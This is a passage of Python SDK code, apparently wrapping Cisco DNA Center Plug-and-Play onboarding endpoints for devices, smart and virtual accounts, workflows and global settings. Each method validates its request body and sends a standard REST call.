    use_custom_headers = bool(headers)
    if use_custom_headers:
        merged_headers.update(dict_of_str(headers))

    endpoint_full_url = apply_path_params(
        '/dna/intent/api/v1/onboarding/pnp-device/unclaim', {})
    if use_custom_headers:
        json_data = self._session.post(endpoint_full_url,
                                       params=query_params,
                                       json=request_body,
                                       headers=merged_headers)
    else:
        json_data = self._session.post(endpoint_full_url,
                                       params=query_params,
                                       json=request_body)
    return self._object_factory('bpm_0b836b7b4b6a9fd5_v1_3_3', json_data)
def update_device(self,
                  id,
                  _id=None,
                  deviceInfo=None,
                  runSummaryList=None,
                  systemResetWorkflow=None,
                  systemWorkflow=None,
                  tenantId=None,
                  version=None,
                  workflow=None,
                  workflowParameters=None,
                  headers=None,
                  payload=None,
                  active_validation=True,
                  **request_parameters):
    """Update device details specified by device id in PnP database.

    Args:
        id(basestring): id path parameter (device id).
        _id(string): Device's _id.
        deviceInfo(object): Device's deviceInfo.
        runSummaryList(list): Device's runSummaryList (list of objects).
        systemResetWorkflow(object): Device's systemResetWorkflow.
        systemWorkflow(object): Device's systemWorkflow.
        tenantId(string): Device's tenantId.
        version(number): Device's version.
        workflow(object): Device's workflow.
        workflowParameters(object): Device's workflowParameters.
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        payload(dict): A JSON serializable Python object to send in
            the body of the Request; merged over the named arguments.
        active_validation(bool): Enable/Disable payload validation.
            Defaults to True.
        **request_parameters: Additional request parameters (provides
            support for parameters that may be added in the future).

    Returns:
        MyDict: JSON response. Access the object's properties by using
        the dot notation or the bracket notation.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the DNA Center cloud returns an error.
    """
    check_type(headers, dict)
    check_type(payload, dict)
    check_type(id, basestring, may_be_none=False)
    if headers is not None:
        for header_name in ('Content-Type', 'X-Auth-Token'):
            if header_name in headers:
                check_type(headers.get(header_name), basestring,
                           may_be_none=False)

    query_params = dict_from_items_with_values(dict(request_parameters))
    path_params = {
        'id': id,
    }

    # Explicit payload entries are overridden by the raw `payload` dict;
    # None-valued entries are dropped before validation.
    request_body = {
        '_id': _id,
        'deviceInfo': deviceInfo,
        'runSummaryList': runSummaryList,
        'systemResetWorkflow': systemResetWorkflow,
        'systemWorkflow': systemWorkflow,
        'tenantId': tenantId,
        'version': version,
        'workflow': workflow,
        'workflowParameters': workflowParameters,
    }
    request_body.update(payload or {})
    request_body = dict_from_items_with_values(request_body)
    if active_validation:
        self._request_validator('jsd_09b0f9ce4239ae10_v1_3_3')\
            .validate(request_body)

    merged_headers = self._session.headers or {}
    use_custom_headers = bool(headers)
    if use_custom_headers:
        merged_headers.update(dict_of_str(headers))

    endpoint_full_url = apply_path_params(
        '/dna/intent/api/v1/onboarding/pnp-device/${id}', path_params)
    if use_custom_headers:
        json_data = self._session.put(endpoint_full_url,
                                      params=query_params,
                                      json=request_body,
                                      headers=merged_headers)
    else:
        json_data = self._session.put(endpoint_full_url,
                                      params=query_params,
                                      json=request_body)
    return self._object_factory('bpm_09b0f9ce4239ae10_v1_3_3', json_data)
def import_devices_in_bulk(self,
                           headers=None,
                           payload=None,
                           active_validation=True,
                           **request_parameters):
    """Add devices to PnP in bulk.

    Args:
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        payload(list): A JSON serializable Python object (list) to
            send in the body of the Request.
        active_validation(bool): Enable/Disable payload validation.
            Defaults to True.
        **request_parameters: Additional request parameters (provides
            support for parameters that may be added in the future).

    Returns:
        MyDict: JSON response. Access the object's properties by using
        the dot notation or the bracket notation.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the DNA Center cloud returns an error.
    """
    check_type(headers, dict)
    # Bulk import takes a list body, unlike the dict-bodied endpoints.
    check_type(payload, list)
    if headers is not None:
        for header_name in ('Content-Type', 'X-Auth-Token'):
            if header_name in headers:
                check_type(headers.get(header_name), basestring,
                           may_be_none=False)

    query_params = dict_from_items_with_values(dict(request_parameters))

    request_body = payload or []
    if active_validation:
        self._request_validator('jsd_21a6db2540298f55_v1_3_3')\
            .validate(request_body)

    merged_headers = self._session.headers or {}
    use_custom_headers = bool(headers)
    if use_custom_headers:
        merged_headers.update(dict_of_str(headers))

    endpoint_full_url = apply_path_params(
        '/dna/intent/api/v1/onboarding/pnp-device/import', {})
    if use_custom_headers:
        json_data = self._session.post(endpoint_full_url,
                                       params=query_params,
                                       json=request_body,
                                       headers=merged_headers)
    else:
        json_data = self._session.post(endpoint_full_url,
                                       params=query_params,
                                       json=request_body)
    return self._object_factory('bpm_21a6db2540298f55_v1_3_3', json_data)
def add_virtual_account(self,
                        autoSyncPeriod=None,
                        ccoUser=None,
                        expiry=None,
                        lastSync=None,
                        profile=None,
                        smartAccountId=None,
                        syncResult=None,
                        syncResultStr=None,
                        syncStartTime=None,
                        syncStatus=None,
                        tenantId=None,
                        token=None,
                        virtualAccountId=None,
                        headers=None,
                        payload=None,
                        active_validation=True,
                        **request_parameters):
    """Register a Smart Account, Virtual Account and the relevant
    server profile info with the PnP System & database. The devices
    present in the registered virtual account are synced with the PnP
    database as well. The response payload returns the new profile.

    Args:
        autoSyncPeriod(number): SAVAMapping's autoSyncPeriod.
        ccoUser(string): SAVAMapping's ccoUser.
        expiry(number): SAVAMapping's expiry.
        lastSync(number): SAVAMapping's lastSync.
        profile(object): SAVAMapping's profile.
        smartAccountId(string): SAVAMapping's smartAccountId.
        syncResult(object): SAVAMapping's syncResult.
        syncResultStr(string): SAVAMapping's syncResultStr.
        syncStartTime(number): SAVAMapping's syncStartTime.
        syncStatus(string): SAVAMapping's syncStatus. Available values
            are 'NOT_SYNCED', 'SYNCING', 'SUCCESS' and 'FAILURE'.
        tenantId(string): SAVAMapping's tenantId.
        token(string): SAVAMapping's token.
        virtualAccountId(string): SAVAMapping's virtualAccountId.
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        payload(dict): A JSON serializable Python object to send in
            the body of the Request; merged over the named arguments.
        active_validation(bool): Enable/Disable payload validation.
            Defaults to True.
        **request_parameters: Additional request parameters (provides
            support for parameters that may be added in the future).

    Returns:
        MyDict: JSON response. Access the object's properties by using
        the dot notation or the bracket notation.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the DNA Center cloud returns an error.
    """
    check_type(headers, dict)
    check_type(payload, dict)
    if headers is not None:
        for header_name in ('Content-Type', 'X-Auth-Token'):
            if header_name in headers:
                check_type(headers.get(header_name), basestring,
                           may_be_none=False)

    query_params = dict_from_items_with_values(dict(request_parameters))

    # Explicit payload entries are overridden by the raw `payload` dict;
    # None-valued entries are dropped before validation.
    request_body = {
        'autoSyncPeriod': autoSyncPeriod,
        'ccoUser': ccoUser,
        'expiry': expiry,
        'lastSync': lastSync,
        'profile': profile,
        'smartAccountId': smartAccountId,
        'syncResult': syncResult,
        'syncResultStr': syncResultStr,
        'syncStartTime': syncStartTime,
        'syncStatus': syncStatus,
        'tenantId': tenantId,
        'token': token,
        'virtualAccountId': virtualAccountId,
    }
    request_body.update(payload or {})
    request_body = dict_from_items_with_values(request_body)
    if active_validation:
        self._request_validator('jsd_1e962af345b8b59f_v1_3_3')\
            .validate(request_body)

    merged_headers = self._session.headers or {}
    use_custom_headers = bool(headers)
    if use_custom_headers:
        merged_headers.update(dict_of_str(headers))

    endpoint_full_url = apply_path_params(
        '/dna/intent/api/v1/onboarding/pnp-settings/savacct', {})
    if use_custom_headers:
        json_data = self._session.post(endpoint_full_url,
                                       params=query_params,
                                       json=request_body,
                                       headers=merged_headers)
    else:
        json_data = self._session.post(endpoint_full_url,
                                       params=query_params,
                                       json=request_body)
    return self._object_factory('bpm_1e962af345b8b59f_v1_3_3', json_data)
def update_workflow(self,
                    id,
                    _id=None,
                    addToInventory=None,
                    addedOn=None,
                    configId=None,
                    currTaskIdx=None,
                    description=None,
                    endTime=None,
                    execTime=None,
                    imageId=None,
                    instanceType=None,
                    lastupdateOn=None,
                    name=None,
                    startTime=None,
                    state=None,
                    tasks=None,
                    tenantId=None,
                    type=None,
                    useState=None,
                    version=None,
                    headers=None,
                    payload=None,
                    active_validation=True,
                    **request_parameters):
    """Update an existing workflow.

    Args:
        id(basestring): id path parameter (workflow id).
        _id(string): Workflow's _id.
        addToInventory(boolean): Workflow's addToInventory.
        addedOn(number): Workflow's addedOn.
        configId(string): Workflow's configId.
        currTaskIdx(number): Workflow's currTaskIdx.
        description(string): Workflow's description.
        endTime(number): Workflow's endTime.
        execTime(number): Workflow's execTime.
        imageId(string): Workflow's imageId.
        instanceType(string): Workflow's instanceType. Available values
            are 'SystemWorkflow', 'UserWorkflow' and
            'SystemResetWorkflow'.
        lastupdateOn(number): Workflow's lastupdateOn.
        name(string): Workflow's name.
        startTime(number): Workflow's startTime.
        state(string): Workflow's state.
        tasks(list): Workflow's tasks (list of objects).
        tenantId(string): Workflow's tenantId.
        type(string): Workflow's type.
        useState(string): Workflow's useState.
        version(number): Workflow's version.
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        payload(dict): A JSON serializable Python object to send in
            the body of the Request; merged over the named arguments.
        active_validation(bool): Enable/Disable payload validation.
            Defaults to True.
        **request_parameters: Additional request parameters (provides
            support for parameters that may be added in the future).

    Returns:
        MyDict: JSON response. Access the object's properties by using
        the dot notation or the bracket notation.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the DNA Center cloud returns an error.
    """
    check_type(headers, dict)
    check_type(payload, dict)
    check_type(id, basestring, may_be_none=False)
    if headers is not None:
        for header_name in ('Content-Type', 'X-Auth-Token'):
            if header_name in headers:
                check_type(headers.get(header_name), basestring,
                           may_be_none=False)

    query_params = dict_from_items_with_values(dict(request_parameters))
    path_params = {
        'id': id,
    }

    # Explicit payload entries are overridden by the raw `payload` dict;
    # None-valued entries are dropped before validation.
    request_body = {
        '_id': _id,
        'addToInventory': addToInventory,
        'addedOn': addedOn,
        'configId': configId,
        'currTaskIdx': currTaskIdx,
        'description': description,
        'endTime': endTime,
        'execTime': execTime,
        'imageId': imageId,
        'instanceType': instanceType,
        'lastupdateOn': lastupdateOn,
        'name': name,
        'startTime': startTime,
        'state': state,
        'tasks': tasks,
        'tenantId': tenantId,
        'type': type,
        'useState': useState,
        'version': version,
    }
    request_body.update(payload or {})
    request_body = dict_from_items_with_values(request_body)
    if active_validation:
        self._request_validator('jsd_3086c9624f498b85_v1_3_3')\
            .validate(request_body)

    merged_headers = self._session.headers or {}
    use_custom_headers = bool(headers)
    if use_custom_headers:
        merged_headers.update(dict_of_str(headers))

    endpoint_full_url = apply_path_params(
        '/dna/intent/api/v1/onboarding/pnp-workflow/${id}', path_params)
    if use_custom_headers:
        json_data = self._session.put(endpoint_full_url,
                                      params=query_params,
                                      json=request_body,
                                      headers=merged_headers)
    else:
        json_data = self._session.put(endpoint_full_url,
                                      params=query_params,
                                      json=request_body)
    return self._object_factory('bpm_3086c9624f498b85_v1_3_3', json_data)
def deregister_virtual_account(self,
                               domain,
                               name,
                               headers=None,
                               **request_parameters):
    """Deregister the specified smart account & virtual account info
    and the associated device information from the PnP System &
    database. The devices associated with the deregistered virtual
    account are removed from the PnP database as well. The response
    payload contains the deregistered smart & virtual account
    information.

    Args:
        domain(basestring): Smart Account Domain.
        name(basestring): Virtual Account Name.
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        **request_parameters: Additional request parameters (provides
            support for parameters that may be added in the future).

    Returns:
        MyDict: JSON response. Access the object's properties by using
        the dot notation or the bracket notation.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the DNA Center cloud returns an error.
    """
    check_type(headers, dict)
    check_type(domain, basestring, may_be_none=False)
    check_type(name, basestring, may_be_none=False)
    if headers is not None and 'X-Auth-Token' in headers:
        check_type(headers.get('X-Auth-Token'), basestring,
                   may_be_none=False)

    # Unlike the sync-result endpoint, domain/name travel as query
    # parameters here, not path parameters.
    query_params = {
        'domain': domain,
        'name': name,
    }
    query_params.update(request_parameters)
    query_params = dict_from_items_with_values(query_params)

    merged_headers = self._session.headers or {}
    use_custom_headers = bool(headers)
    if use_custom_headers:
        merged_headers.update(dict_of_str(headers))

    endpoint_full_url = apply_path_params(
        '/dna/intent/api/v1/onboarding/pnp-settings/vacct', {})
    if use_custom_headers:
        json_data = self._session.delete(endpoint_full_url,
                                         params=query_params,
                                         headers=merged_headers)
    else:
        json_data = self._session.delete(endpoint_full_url,
                                         params=query_params)
    return self._object_factory('bpm_2499e9ad42e8ae5b_v1_3_3', json_data)
def get_smart_account_list(self,
                           headers=None,
                           **request_parameters):
    """Return the list of Smart Account domains.

    Args:
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        **request_parameters: Additional request parameters (provides
            support for parameters that may be added in the future).

    Returns:
        list: JSON response. A list of MyDict objects. Access the
        object's properties by using the dot notation or the bracket
        notation.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the DNA Center cloud returns an error.
    """
    check_type(headers, dict)
    if headers is not None and 'X-Auth-Token' in headers:
        check_type(headers.get('X-Auth-Token'), basestring,
                   may_be_none=False)

    query_params = dict_from_items_with_values(dict(request_parameters))

    merged_headers = self._session.headers or {}
    use_custom_headers = bool(headers)
    if use_custom_headers:
        merged_headers.update(dict_of_str(headers))

    endpoint_full_url = apply_path_params(
        '/dna/intent/api/v1/onboarding/pnp-settings/sacct', {})
    if use_custom_headers:
        json_data = self._session.get(endpoint_full_url,
                                      params=query_params,
                                      headers=merged_headers)
    else:
        json_data = self._session.get(endpoint_full_url,
                                      params=query_params)
    return self._object_factory('bpm_3cb24acb486b89d2_v1_3_3', json_data)
def claim_a_device_to_a_site(self,
                             deviceId=None,
                             siteId=None,
                             type=None,
                             headers=None,
                             payload=None,
                             active_validation=True,
                             **request_parameters):
    """Claim a device based on DNA-C Site based design process.
    Different parameters are required for different device platforms.

    Args:
        deviceId(string): SiteProvisionRequest's deviceId.
        siteId(string): SiteProvisionRequest's siteId.
        type(string): SiteProvisionRequest's type. Available values
            are 'Default', 'AccessPoint', 'StackSwitch', 'Sensor' and
            'MobilityExpress'.
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        payload(dict): A JSON serializable Python object to send in
            the body of the Request; merged over the named arguments.
        active_validation(bool): Enable/Disable payload validation.
            Defaults to True.
        **request_parameters: Additional request parameters (provides
            support for parameters that may be added in the future).

    Returns:
        MyDict: JSON response. Access the object's properties by using
        the dot notation or the bracket notation.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the DNA Center cloud returns an error.
    """
    check_type(headers, dict)
    check_type(payload, dict)
    if headers is not None:
        for header_name in ('Content-Type', 'X-Auth-Token'):
            if header_name in headers:
                check_type(headers.get(header_name), basestring,
                           may_be_none=False)

    query_params = dict_from_items_with_values(dict(request_parameters))

    # Explicit payload entries are overridden by the raw `payload` dict;
    # None-valued entries are dropped before validation.
    request_body = {
        'deviceId': deviceId,
        'siteId': siteId,
        'type': type,
    }
    request_body.update(payload or {})
    request_body = dict_from_items_with_values(request_body)
    if active_validation:
        self._request_validator('jsd_5889fb844939a13b_v1_3_3')\
            .validate(request_body)

    merged_headers = self._session.headers or {}
    use_custom_headers = bool(headers)
    if use_custom_headers:
        merged_headers.update(dict_of_str(headers))

    endpoint_full_url = apply_path_params(
        '/dna/intent/api/v1/onboarding/pnp-device/site-claim', {})
    if use_custom_headers:
        json_data = self._session.post(endpoint_full_url,
                                       params=query_params,
                                       json=request_body,
                                       headers=merged_headers)
    else:
        json_data = self._session.post(endpoint_full_url,
                                       params=query_params,
                                       json=request_body)
    return self._object_factory('bpm_5889fb844939a13b_v1_3_3', json_data)
def update_pnp_server_profile(self,
                              autoSyncPeriod=None,
                              ccoUser=None,
                              expiry=None,
                              lastSync=None,
                              profile=None,
                              smartAccountId=None,
                              syncResult=None,
                              syncResultStr=None,
                              syncStartTime=None,
                              syncStatus=None,
                              tenantId=None,
                              token=None,
                              virtualAccountId=None,
                              headers=None,
                              payload=None,
                              active_validation=True,
                              **request_parameters):
    """Update the PnP server profile of a registered virtual account.

    The response payload carries the updated smart & virtual account
    information.

    Args:
        autoSyncPeriod(number): SAVAMapping's autoSyncPeriod.
        ccoUser(string): SAVAMapping's ccoUser.
        expiry(number): SAVAMapping's expiry.
        lastSync(number): SAVAMapping's lastSync.
        profile(object): SAVAMapping's profile.
        smartAccountId(string): SAVAMapping's smartAccountId.
        syncResult(object): SAVAMapping's syncResult.
        syncResultStr(string): SAVAMapping's syncResultStr.
        syncStartTime(number): SAVAMapping's syncStartTime.
        syncStatus(string): SAVAMapping's syncStatus. Available
            values are 'NOT_SYNCED', 'SYNCING', 'SUCCESS' and
            'FAILURE'.
        tenantId(string): SAVAMapping's tenantId.
        token(string): SAVAMapping's token.
        virtualAccountId(string): SAVAMapping's virtualAccountId.
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        payload(dict): A JSON serializable Python object to send in the
            body of the Request.
        active_validation(bool): Enable/Disable payload validation.
            Defaults to True.
        **request_parameters: Additional request parameters (provides
            support for parameters that may be added in the future).

    Returns:
        MyDict: JSON response. Access the object's properties by using
        the dot notation or the bracket notation.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the DNA Center cloud returns an error.
    """
    check_type(headers, dict)
    check_type(payload, dict)
    if headers is not None:
        for hdr in ('Content-Type', 'X-Auth-Token'):
            if hdr in headers:
                check_type(headers.get(hdr), basestring,
                           may_be_none=False)

    # Only the free-form request parameters become query arguments.
    query_params = dict_from_items_with_values(dict(request_parameters))

    body = {
        'autoSyncPeriod': autoSyncPeriod,
        'ccoUser': ccoUser,
        'expiry': expiry,
        'lastSync': lastSync,
        'profile': profile,
        'smartAccountId': smartAccountId,
        'syncResult': syncResult,
        'syncResultStr': syncResultStr,
        'syncStartTime': syncStartTime,
        'syncStatus': syncStatus,
        'tenantId': tenantId,
        'token': token,
        'virtualAccountId': virtualAccountId,
    }
    body.update(payload or {})
    body = dict_from_items_with_values(body)
    if active_validation:
        # Check the body against the endpoint's JSON schema.
        self._request_validator('jsd_6f9819e84178870c_v1_3_3')\
            .validate(body)

    url = apply_path_params(
        '/dna/intent/api/v1/onboarding/pnp-settings/savacct', {})

    if headers:
        # NOTE(review): when the session header mapping is non-empty it
        # is updated in place here -- same as the original behavior.
        merged_headers = self._session.headers or {}
        merged_headers.update(dict_of_str(headers))
        json_data = self._session.put(url, params=query_params,
                                      json=body,
                                      headers=merged_headers)
    else:
        json_data = self._session.put(url, params=query_params,
                                      json=body)

    return self._object_factory('bpm_6f9819e84178870c_v1_3_3', json_data)
def get_pnp_global_settings(self,
                            headers=None,
                            **request_parameters):
    """Return the user's global PnP settings.

    Args:
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        **request_parameters: Additional request parameters (provides
            support for parameters that may be added in the future).

    Returns:
        MyDict: JSON response. Access the object's properties by using
        the dot notation or the bracket notation.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the DNA Center cloud returns an error.
    """
    check_type(headers, dict)
    if headers is not None and 'X-Auth-Token' in headers:
        check_type(headers.get('X-Auth-Token'), basestring,
                   may_be_none=False)

    query_params = dict_from_items_with_values(dict(request_parameters))

    url = apply_path_params('/dna/intent/api/v1/onboarding/pnp-settings',
                            {})

    if headers:
        # NOTE(review): non-empty session headers are updated in place,
        # mirroring the original implementation.
        merged_headers = self._session.headers or {}
        merged_headers.update(dict_of_str(headers))
        json_data = self._session.get(url, params=query_params,
                                      headers=merged_headers)
    else:
        json_data = self._session.get(url, params=query_params)

    return self._object_factory('bpm_7e92f9eb46db8320_v1_3_3', json_data)
def get_workflow_count(self,
                       name=None,
                       headers=None,
                       **request_parameters):
    """Return the number of PnP workflows, optionally filtered by name.

    Args:
        name(basestring): Workflow Name.
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        **request_parameters: Additional request parameters (provides
            support for parameters that may be added in the future).

    Returns:
        MyDict: JSON response. Access the object's properties by using
        the dot notation or the bracket notation.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the DNA Center cloud returns an error.
    """
    check_type(headers, dict)
    check_type(name, basestring)
    if headers is not None and 'X-Auth-Token' in headers:
        check_type(headers.get('X-Auth-Token'), basestring,
                   may_be_none=False)

    query_params = {'name': name}
    query_params.update(request_parameters)
    # Drop entries whose value is None.
    query_params = dict_from_items_with_values(query_params)

    url = apply_path_params(
        '/dna/intent/api/v1/onboarding/pnp-workflow/count', {})

    if headers:
        merged_headers = self._session.headers or {}
        merged_headers.update(dict_of_str(headers))
        json_data = self._session.get(url, params=query_params,
                                      headers=merged_headers)
    else:
        json_data = self._session.get(url, params=query_params)

    return self._object_factory('bpm_7989f86846faaf99_v1_3_3', json_data)
def get_virtual_account_list(self,
                             domain,
                             headers=None,
                             **request_parameters):
    """Return the virtual accounts associated with a smart account.

    Args:
        domain(basestring): Smart Account Domain.
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        **request_parameters: Additional request parameters (provides
            support for parameters that may be added in the future).

    Returns:
        list: JSON response. A list of MyDict objects. Access the
        object's properties by using the dot notation or the bracket
        notation.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the DNA Center cloud returns an error.
    """
    check_type(headers, dict)
    check_type(domain, basestring, may_be_none=False)
    if headers is not None and 'X-Auth-Token' in headers:
        check_type(headers.get('X-Auth-Token'), basestring,
                   may_be_none=False)

    query_params = dict_from_items_with_values(dict(request_parameters))

    # ${domain} is substituted by apply_path_params.
    url = apply_path_params(
        '/dna/intent/api/v1/onboarding/pnp-'
        'settings/sacct/${domain}/vacct',
        {'domain': domain})

    if headers:
        merged_headers = self._session.headers or {}
        merged_headers.update(dict_of_str(headers))
        json_data = self._session.get(url, params=query_params,
                                      headers=merged_headers)
    else:
        json_data = self._session.get(url, params=query_params)

    return self._object_factory('bpm_70a479a6462a9496_v1_3_3', json_data)
def get_workflow_by_id(self,
                       id,
                       headers=None,
                       **request_parameters):
    """Return the PnP workflow matching the given id.

    Args:
        id(basestring): id path parameter.
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        **request_parameters: Additional request parameters (provides
            support for parameters that may be added in the future).

    Returns:
        MyDict: JSON response. Access the object's properties by using
        the dot notation or the bracket notation.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the DNA Center cloud returns an error.
    """
    check_type(headers, dict)
    check_type(id, basestring, may_be_none=False)
    if headers is not None and 'X-Auth-Token' in headers:
        check_type(headers.get('X-Auth-Token'), basestring,
                   may_be_none=False)

    query_params = dict_from_items_with_values(dict(request_parameters))

    url = apply_path_params(
        '/dna/intent/api/v1/onboarding/pnp-workflow/${id}',
        {'id': id})

    if headers:
        merged_headers = self._session.headers or {}
        merged_headers.update(dict_of_str(headers))
        json_data = self._session.get(url, params=query_params,
                                      headers=merged_headers)
    else:
        json_data = self._session.get(url, params=query_params)

    return self._object_factory('bpm_80acb88e4ac9ac6d_v1_3_3', json_data)
def add_a_workflow(self,
                   _id=None,
                   addToInventory=None,
                   addedOn=None,
                   configId=None,
                   currTaskIdx=None,
                   description=None,
                   endTime=None,
                   execTime=None,
                   imageId=None,
                   instanceType=None,
                   lastupdateOn=None,
                   name=None,
                   startTime=None,
                   state=None,
                   tasks=None,
                   tenantId=None,
                   type=None,
                   useState=None,
                   version=None,
                   headers=None,
                   payload=None,
                   active_validation=True,
                   **request_parameters):
    """Add a PnP workflow, with its tasks, to the PnP database.

    Args:
        _id(string): Workflow's _id.
        addToInventory(boolean): Workflow's addToInventory.
        addedOn(number): Workflow's addedOn.
        configId(string): Workflow's configId.
        currTaskIdx(number): Workflow's currTaskIdx.
        description(string): Workflow's description.
        endTime(number): Workflow's endTime.
        execTime(number): Workflow's execTime.
        imageId(string): Workflow's imageId.
        instanceType(string): Workflow's instanceType. Available
            values are 'SystemWorkflow', 'UserWorkflow' and
            'SystemResetWorkflow'.
        lastupdateOn(number): Workflow's lastupdateOn.
        name(string): Workflow's name.
        startTime(number): Workflow's startTime.
        state(string): Workflow's state.
        tasks(list): Workflow's tasks (list of objects).
        tenantId(string): Workflow's tenantId.
        type(string): Workflow's type.
        useState(string): Workflow's useState.
        version(number): Workflow's version.
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        payload(dict): A JSON serializable Python object to send in the
            body of the Request.
        active_validation(bool): Enable/Disable payload validation.
            Defaults to True.
        **request_parameters: Additional request parameters (provides
            support for parameters that may be added in the future).

    Returns:
        MyDict: JSON response. Access the object's properties by using
        the dot notation or the bracket notation.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the DNA Center cloud returns an error.
    """
    check_type(headers, dict)
    check_type(payload, dict)
    if headers is not None:
        for hdr in ('Content-Type', 'X-Auth-Token'):
            if hdr in headers:
                check_type(headers.get(hdr), basestring,
                           may_be_none=False)

    query_params = dict_from_items_with_values(dict(request_parameters))

    body = {
        '_id': _id,
        'addToInventory': addToInventory,
        'addedOn': addedOn,
        'configId': configId,
        'currTaskIdx': currTaskIdx,
        'description': description,
        'endTime': endTime,
        'execTime': execTime,
        'imageId': imageId,
        'instanceType': instanceType,
        'lastupdateOn': lastupdateOn,
        'name': name,
        'startTime': startTime,
        'state': state,
        'tasks': tasks,
        'tenantId': tenantId,
        'type': type,
        'useState': useState,
        'version': version,
    }
    body.update(payload or {})
    body = dict_from_items_with_values(body)
    if active_validation:
        self._request_validator('jsd_848b5a7b4f9b8c12_v1_3_3')\
            .validate(body)

    url = apply_path_params(
        '/dna/intent/api/v1/onboarding/pnp-workflow', {})

    if headers:
        # NOTE(review): a non-empty session header mapping is updated
        # in place -- same behavior as the original.
        merged_headers = self._session.headers or {}
        merged_headers.update(dict_of_str(headers))
        json_data = self._session.post(url, params=query_params,
                                       json=body,
                                       headers=merged_headers)
    else:
        json_data = self._session.post(url, params=query_params,
                                       json=body)

    return self._object_factory('bpm_848b5a7b4f9b8c12_v1_3_3', json_data)
def update_pnp_global_settings(self,
                               _id=None,
                               aaaCredentials=None,
                               acceptEula=None,
                               defaultProfile=None,
                               savaMappingList=None,
                               taskTimeOuts=None,
                               tenantId=None,
                               version=None,
                               headers=None,
                               payload=None,
                               active_validation=True,
                               **request_parameters):
    """Update the user's list of global PnP settings.

    Args:
        _id(string): Settings's _id.
        aaaCredentials(object): Settings's aaaCredentials.
        acceptEula(boolean): Settings's acceptEula.
        defaultProfile(object): Settings's defaultProfile.
        savaMappingList(list): Settings's savaMappingList (list of
            objects).
        taskTimeOuts(object): Settings's taskTimeOuts.
        tenantId(string): Settings's tenantId.
        version(number): Settings's version.
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        payload(dict): A JSON serializable Python object to send in the
            body of the Request.
        active_validation(bool): Enable/Disable payload validation.
            Defaults to True.
        **request_parameters: Additional request parameters (provides
            support for parameters that may be added in the future).

    Returns:
        MyDict: JSON response. Access the object's properties by using
        the dot notation or the bracket notation.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the DNA Center cloud returns an error.
    """
    check_type(headers, dict)
    check_type(payload, dict)
    if headers is not None:
        for hdr in ('Content-Type', 'X-Auth-Token'):
            if hdr in headers:
                check_type(headers.get(hdr), basestring,
                           may_be_none=False)

    query_params = dict_from_items_with_values(dict(request_parameters))

    body = {
        '_id': _id,
        'aaaCredentials': aaaCredentials,
        'acceptEula': acceptEula,
        'defaultProfile': defaultProfile,
        'savaMappingList': savaMappingList,
        'taskTimeOuts': taskTimeOuts,
        'tenantId': tenantId,
        'version': version,
    }
    body.update(payload or {})
    body = dict_from_items_with_values(body)
    if active_validation:
        self._request_validator('jsd_8da0391947088a5a_v1_3_3')\
            .validate(body)

    url = apply_path_params(
        '/dna/intent/api/v1/onboarding/pnp-settings', {})

    if headers:
        merged_headers = self._session.headers or {}
        merged_headers.update(dict_of_str(headers))
        json_data = self._session.put(url, params=query_params,
                                      json=body,
                                      headers=merged_headers)
    else:
        json_data = self._session.put(url, params=query_params,
                                      json=body)

    return self._object_factory('bpm_8da0391947088a5a_v1_3_3', json_data)
def reset_device(self,
                 deviceResetList=None,
                 projectId=None,
                 workflowId=None,
                 headers=None,
                 payload=None,
                 active_validation=True,
                 **request_parameters):
    """Recover a device from a Workflow Execution Error state.

    Args:
        deviceResetList(list): ResetRequest's deviceResetList (list of
            objects).
        projectId(string): ResetRequest's projectId.
        workflowId(string): ResetRequest's workflowId.
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        payload(dict): A JSON serializable Python object to send in the
            body of the Request.
        active_validation(bool): Enable/Disable payload validation.
            Defaults to True.
        **request_parameters: Additional request parameters (provides
            support for parameters that may be added in the future).

    Returns:
        MyDict: JSON response. Access the object's properties by using
        the dot notation or the bracket notation.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the DNA Center cloud returns an error.
    """
    check_type(headers, dict)
    check_type(payload, dict)
    if headers is not None:
        for hdr in ('Content-Type', 'X-Auth-Token'):
            if hdr in headers:
                check_type(headers.get(hdr), basestring,
                           may_be_none=False)

    query_params = dict_from_items_with_values(dict(request_parameters))

    body = {
        'deviceResetList': deviceResetList,
        'projectId': projectId,
        'workflowId': workflowId,
    }
    body.update(payload or {})
    body = dict_from_items_with_values(body)
    if active_validation:
